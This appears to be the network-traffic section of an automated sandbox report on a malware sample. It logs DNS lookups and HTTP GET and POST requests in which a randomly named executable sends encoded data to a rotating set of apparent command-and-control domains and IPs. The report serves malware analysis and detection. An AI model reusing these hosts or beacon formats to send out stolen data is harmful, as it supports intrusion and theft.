                                                                                                              Nov 5, 2024 15:38:54.002943039 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:54.004715919 CET4981480192.168.11.20203.161.41.204
                                                                                                              Nov 5, 2024 15:38:54.182323933 CET8049814203.161.41.204192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.019200087 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.195050001 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.195239067 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.203851938 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.383042097 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383099079 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383141041 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383183002 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383213043 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383238077 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.383245945 CET804981568.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:38:59.383404016 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:38:59.383404970 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:00.719849110 CET4981580192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:01.737302065 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:01.915448904 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:01.915712118 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:01.923854113 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:02.104667902 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104680061 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104686975 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104818106 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104820013 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:02.104825020 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.104857922 CET804981668.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:02.105016947 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:03.438052893 CET4981680192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.455439091 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.632527113 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.632754087 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.640604973 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.640657902 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.640702009 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.818608999 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.818669081 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.819040060 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830723047 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830780983 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830822945 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830864906 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830893993 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.830924988 CET804981768.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:04.831001043 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:04.831065893 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:06.156111002 CET4981780192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.173577070 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.350042105 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.350253105 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.355928898 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.534816980 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.534876108 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.534919024 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.534960985 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535002947 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535043955 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535064936 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.535087109 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535130978 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535160065 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535187006 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.535192966 CET804981868.65.122.222192.168.11.20
                                                                                                              Nov 5, 2024 15:39:07.535234928 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.535449982 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.535449982 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.537337065 CET4981880192.168.11.2068.65.122.222
                                                                                                              Nov 5, 2024 15:39:07.713538885 CET804981868.65.122.222192.168.11.20

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 5, 2024 15:33:52.297408104 CET5767453192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:33:52.427223921 CET53576741.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:34:08.286053896 CET5406753192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:34:08.479995012 CET53540671.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:34:21.845518112 CET5370553192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:34:21.964540958 CET53537051.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:34:35.139524937 CET5426753192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:34:35.453181982 CET53542671.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:34:49.042687893 CET5188653192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:34:49.968568087 CET53518861.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:35:04.789433956 CET4980253192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:35:04.905602932 CET53498021.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:35:12.959551096 CET6491553192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:35:13.368509054 CET53649151.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:35:26.987545013 CET5966653192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:35:27.106681108 CET53596661.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:35:40.609622002 CET5025253192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:35:40.724112988 CET53502521.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:35:54.247195959 CET5809453192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:35:55.158598900 CET53580941.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:36:09.353311062 CET6477253192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:36:09.519973993 CET53647721.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:36:22.678458929 CET5443853192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:36:22.788470030 CET53544381.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:36:35.956841946 CET6061353192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:36:36.071552992 CET53606131.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:36:44.126966000 CET5416953192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:36:44.246532917 CET53541691.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:36:57.405277014 CET5949053192.168.11.201.1.1.1
                                                                                                              Nov 5, 2024 15:36:58.418445110 CET5949053192.168.11.209.9.9.9
                                                                                                              Nov 5, 2024 15:36:58.527209997 CET53594909.9.9.9192.168.11.20
                                                                                                              Nov 5, 2024 15:37:00.038125992 CET53594901.1.1.1192.168.11.20
                                                                                                              Nov 5, 2024 15:37:06.591197968 CET6145653192.168.11.209.9.9.9
                                                                                                              Nov 5, 2024 15:37:06.703083992 CET53614569.9.9.9192.168.11.20
                                                                                                              Nov 5, 2024 15:38:23.604027987 CET5129753192.168.11.209.9.9.9
                                                                                                              Nov 5, 2024 15:38:23.718144894 CET53512979.9.9.9192.168.11.20

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Nov 5, 2024 15:33:52.297408104 CET192.168.11.201.1.1.10xb3ccStandard query (0)www.nagasl89.babyA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:08.286053896 CET192.168.11.201.1.1.10xa019Standard query (0)www.abuali-contracting.artA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:21.845518112 CET192.168.11.201.1.1.10xa3b8Standard query (0)www.godskids.storeA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:35.139524937 CET192.168.11.201.1.1.10x289cStandard query (0)www.030002832.xyzA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:49.042687893 CET192.168.11.201.1.1.10xa5feStandard query (0)www.wonders8.liveA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:04.789433956 CET192.168.11.201.1.1.10x5e45Standard query (0)www.pwk-24.xyzA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:12.959551096 CET192.168.11.201.1.1.10x57dbStandard query (0)www.nidedabeille.netA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:26.987545013 CET192.168.11.201.1.1.10x1537Standard query (0)www.brunvox.siteA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:40.609622002 CET192.168.11.201.1.1.10xdb58Standard query (0)www.osi.gardenA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:54.247195959 CET192.168.11.201.1.1.10xe6d5Standard query (0)www.983743.vinA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:09.353311062 CET192.168.11.201.1.1.10xbedcStandard query (0)www.parkerstraus.devA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:22.678458929 CET192.168.11.201.1.1.10x3851Standard query (0)www.mynotebook.shopA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:35.956841946 CET192.168.11.201.1.1.10x9274Standard query (0)www.bav.latA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:44.126966000 CET192.168.11.201.1.1.10xe631Standard query (0)www.notepad.mobiA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:57.405277014 CET192.168.11.201.1.1.10x20d3Standard query (0)www.5oxzis.topA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:58.418445110 CET192.168.11.209.9.9.90x20d3Standard query (0)www.5oxzis.topA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:37:06.591197968 CET192.168.11.209.9.9.90x305fStandard query (0)www.hyman.lifeA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:38:23.604027987 CET192.168.11.209.9.9.90xe123Standard query (0)www.pwk-24.xyzA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Nov 5, 2024 15:33:52.427223921 CET1.1.1.1192.168.11.200xb3ccNo error (0)www.nagasl89.baby104.21.94.87A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:33:52.427223921 CET1.1.1.1192.168.11.200xb3ccNo error (0)www.nagasl89.baby172.67.221.147A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:08.479995012 CET1.1.1.1192.168.11.200xa019No error (0)www.abuali-contracting.artabuali-contracting.artCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:08.479995012 CET1.1.1.1192.168.11.200xa019No error (0)abuali-contracting.art66.198.240.15A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:21.964540958 CET1.1.1.1192.168.11.200xa3b8No error (0)www.godskids.storegodskids.storeCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:21.964540958 CET1.1.1.1192.168.11.200xa3b8No error (0)godskids.store3.33.130.190A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:21.964540958 CET1.1.1.1192.168.11.200xa3b8No error (0)godskids.store15.197.148.33A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:35.453181982 CET1.1.1.1192.168.11.200x289cNo error (0)www.030002832.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:49.968568087 CET1.1.1.1192.168.11.200xa5feNo error (0)www.wonders8.livewonders8.liveCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:34:49.968568087 CET1.1.1.1192.168.11.200xa5feNo error (0)wonders8.live119.18.54.27A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:04.905602932 CET1.1.1.1192.168.11.200x5e45Name error (3)www.pwk-24.xyznonenoneA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:13.368509054 CET1.1.1.1192.168.11.200x57dbNo error (0)www.nidedabeille.netnidedabeille.netCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:13.368509054 CET1.1.1.1192.168.11.200x57dbNo error (0)nidedabeille.net195.110.124.133A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:27.106681108 CET1.1.1.1192.168.11.200x1537No error (0)www.brunvox.site203.161.41.204A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:40.724112988 CET1.1.1.1192.168.11.200xdb58No error (0)www.osi.gardenosi.gardenCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:40.724112988 CET1.1.1.1192.168.11.200xdb58No error (0)osi.garden68.65.122.222A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:35:55.158598900 CET1.1.1.1192.168.11.200xe6d5No error (0)www.983743.vin45.150.55.15A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:09.519973993 CET1.1.1.1192.168.11.200xbedcNo error (0)www.parkerstraus.devparkerstraus.netlify.appCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:09.519973993 CET1.1.1.1192.168.11.200xbedcNo error (0)parkerstraus.netlify.app50.19.214.227A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:09.519973993 CET1.1.1.1192.168.11.200xbedcNo error (0)parkerstraus.netlify.app100.28.201.155A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:22.788470030 CET1.1.1.1192.168.11.200x3851No error (0)www.mynotebook.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:22.788470030 CET1.1.1.1192.168.11.200x3851No error (0)www.mynotebook.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:36.071552992 CET1.1.1.1192.168.11.200x9274Name error (3)www.bav.latnonenoneA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:44.246532917 CET1.1.1.1192.168.11.200xe631No error (0)www.notepad.mobi13.248.169.48A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:44.246532917 CET1.1.1.1192.168.11.200xe631No error (0)www.notepad.mobi76.223.54.146A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:36:58.527209997 CET9.9.9.9192.168.11.200x20d3Name error (3)www.5oxzis.topnonenoneA (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:37:00.038125992 CET1.1.1.1192.168.11.200x20d3No error (0)www.5oxzis.top20.2.217.253A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:37:06.703083992 CET9.9.9.9192.168.11.200x305fNo error (0)www.hyman.lifehyman.lifeCNAME (Canonical name)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:37:06.703083992 CET9.9.9.9192.168.11.200x305fNo error (0)hyman.life15.197.148.33A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:37:06.703083992 CET9.9.9.9192.168.11.200x305fNo error (0)hyman.life3.33.130.190A (IP address)IN (0x0001)false
                                                                                                              Nov 5, 2024 15:38:23.718144894 CET9.9.9.9192.168.11.200xe123Name error (3)www.pwk-24.xyznonenoneA (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • www.nagasl89.baby
                                                                                                              • www.abuali-contracting.art
                                                                                                              • www.godskids.store
                                                                                                              • www.030002832.xyz
                                                                                                              • www.wonders8.live
                                                                                                              • www.nidedabeille.net
                                                                                                              • www.brunvox.site
                                                                                                              • www.osi.garden
                                                                                                              • www.983743.vin
                                                                                                              • www.parkerstraus.dev
                                                                                                              • www.mynotebook.shop
                                                                                                              • www.notepad.mobi
                                                                                                              • www.hyman.life

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.11.2049741104.21.94.87804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:33:52.541462898 CET457OUTGET /vq3l/?Q2_4=WKR5ld2WiQxHxPDU6pm8hrTzAxfoYD+zNd+jQFHpl4y5z9MlTNWt1pAD28TX6W++2340V0NEzWPPUH5FlugQl+5D7H7BO9/OK4RESnHOQd/yty8pNcZLL2g=&uXP=1HX8 HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Language: en-us
                                                                                                              Connection: close
                                                                                                              Host: www.nagasl89.baby
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Nov 5, 2024 15:33:53.247127056 CET1289INHTTP/1.1 404 Not Found
                                                                                                              Date: Tue, 05 Nov 2024 14:33:53 GMT
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              vary: Accept-Encoding
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xYFQ15sgg3sNfaHR7ZWbibC%2FoexqyuLJIbPFTcdmwXy%2Few4tVOYXnv4ZZsG2I9%2B%2FWCe%2Bh2euRAluH21zly4wVAC8B92TOdwqSxZ07XO2ODRBJp%2FpQn4gBzpuqRuv3tXnI1uGWA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8ddd8fb7b8f2726f-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=104780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                              Data Raw: 32 30 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 64 2d 49 44 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 65 6e 65 72 61 74 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 42 75 6b 61 6e 57 6f 72 64 70 72 65 73 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 [TRUNCATED]
                                                                                                              Data Ascii: 2099<!DOCTYPE html><html lang="id-ID"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover" /><meta name="generator" content="BukanWordpress" /><link rel="icon" type="image/x-icon" href="https://www.nagasl89.baby/favicon.ico" /><link rel="sitemap" href="https://www.nagasl89.baby/sitemap.xml" /><link rel="alternate" type="application/rss+xml" title="RTP SLOTO
                                                                                                              Nov 5, 2024 15:33:53.247150898 CET1289INData Raw: 38 39 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 66 65 65 64 2f 72 73 73 22 20 2f 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 61 6c 61 6d 61 6e 20 69 6e 69 20 74 69 64 61
                                                                                                              Data Ascii: 89 Feed" href="https://www.nagasl89.baby/feed/rss" /> <title>Halaman ini tidak ada! - RTP SLOTO89</title> <meta name="description" content="404 Not Found"/> <meta name="keywords" content="SLOTO89, SLOTO89, RTP SLOTO 89, slot gaco
                                                                                                              Nov 5, 2024 15:33:53.247165918 CET1289INData Raw: 73 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 74 68 65 6d 65 73 2f 72 74 70 2f 63 73 73 2f 73 74 79 6c 65 73 6c 6f 74 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d
                                                                                                              Data Ascii: s" href="https://www.nagasl89.baby/themes/rtp/css/styleslot.css" type="text/css" media="all"> <link rel="stylesheet" id="twentyfifteen-style-css" href="https://www.nagasl89.baby/themes/rtp/css/custom.css" type="text/css" media="all"> <
                                                                                                              Nov 5, 2024 15:33:53.247179985 CET1289INData Raw: 79 3d 22 6f 67 3a 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 72 74 69 63 6c 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61
                                                                                                              Data Ascii: y="og:type" content="article"> <meta property="og:url" content="https://www.nagasl89.baby/"> <meta property="og:title" content=""> <meta property="og:description" content="404 Not Found"> <meta property="og:site_name" content="
                                                                                                              Nov 5, 2024 15:33:53.247194052 CET1289INData Raw: 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 73 2e 63 6c 6f 75 64 69 6e 61 72 79 2e 63 6f 6d 2f 70 72 61 63 74 69 63 61 6c 64 65 76 2f 69 6d 61 67 65 2f 66 65 74 63 68 2f 73
                                                                                                              Data Ascii: rel="apple-touch-icon" href="https://res.cloudinary.com/practicaldev/image/fetch/s--gDM0_LTS--/c_limit,f_png,fl_progressive,q_80,w_180/https://practicaldev-herokuapp-com.freetls.fastly.net/assets/devlogo-pwa-512.png"--> ...link rel="apple
                                                                                                              Nov 5, 2024 15:33:53.247209072 CET1289INData Raw: 63 5f 6c 69 6d 69 74 2c 66 5f 70 6e 67 2c 66 6c 5f 70 72 6f 67 72 65 73 73 69 76 65 2c 71 5f 38 30 2c 77 5f 31 32 38 2f 68 74 74 70 73 3a 2f 2f 70 72 61 63 74 69 63 61 6c 64 65 76 2d 68 65 72 6f 6b 75 61 70 70 2d 63 6f 6d 2e 66 72 65 65 74 6c 73
                                                                                                              Data Ascii: c_limit,f_png,fl_progressive,q_80,w_128/https://practicaldev-herokuapp-com.freetls.fastly.net/assets/devlogo-pwa-512.png" rel="icon" sizes="128x128"--> <meta name="apple-mobile-web-app-title" content=""> <meta name="application-name" c
                                                                                                              Nov 5, 2024 15:33:53.247222900 CET1289INData Raw: 72 69 27 29 20 7b 74 68 69 73 2e 76 61 6c 75 65 20 3d 20 27 27 3b 7d 22 20 6f 6e 62 6c 75 72 3d 22 69 66 20 28 74 68 69 73 2e 76 61 6c 75 65 20 3d 3d 20 27 27 29 20 7b 74 68 69 73 2e 76 61 6c 75 65 20 3d 20 27 43 61 72 69 27 3b 7d 22 3e 0d 0a 20
                                                                                                              Data Ascii: ri') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Cari';}"> <input type="submit" value="Cari" class="search-button"> </form> </div></article> <footer id="colophon"
                                                                                                              Nov 5, 2024 15:33:53.247232914 CET125INData Raw: 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 61 67 61 73 6c 38 39 2e 62 61 62 79 2f 6a 73 2f 67 6c 6f 62
                                                                                                              Data Ascii: /script> <script type="text/javascript" src="https://www.nagasl89.baby/js/global.js"></script> </body></html>
                                                                                                              Nov 5, 2024 15:33:53.247243881 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.11.204974266.198.240.15804732C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              Nov 5, 2024 15:34:08.607916117 CET753OUTPOST /ytnk/ HTTP/1.1
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                              Accept-Language: en-us
                                                                                                              Content-Length: 201
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              Connection: close
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: www.abuali-contracting.art
                                                                                                              Origin: http://www.abuali-contracting.art
                                                                                                              Referer: http://www.abuali-contracting.art/ytnk/
                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
                                                                                                              Data Raw: 51 32 5f 34 3d 6a 48 6f 68 30 62 34 4e 57 4b 75 43 6d 76 41 5a 74 6d 45 39 44 38 4a 47 6f 46 73 2b 2f 75 33 75 65 36 67 48 58 76 32 45 4b 61 55 6f 62 31 47 4b 74 39 47 6a 62 6f 68 4a 77 64 4e 36 49 6f 7a 66 6a 55 39 74 39 46 34 49 6a 6d 35 48 41 65 6e 37 41 66 77 36 53 6d 72 42 53 77 53 45 37 41 67 4f 6f 71 71 6d 78 76 33 42 4b 76 74 62 53 36 6e 31 63 67 33 52 5a 71 58 38 37 31 79 2b 35 50 6a 43 35 4a 49 31 66 31 4e 74 73 62 66 54 77 77 2b 37 58 4f 4c 37 47 43 70 74 67 48 6a 58 67 51 4b 78 45 39 70 53 56 73 46 63 51 2b 30 73 43 41 44 34 4c 66 54 32 46 6d 41 4e 48 56 52 71 67 76 78 33 51 51 3d 3d
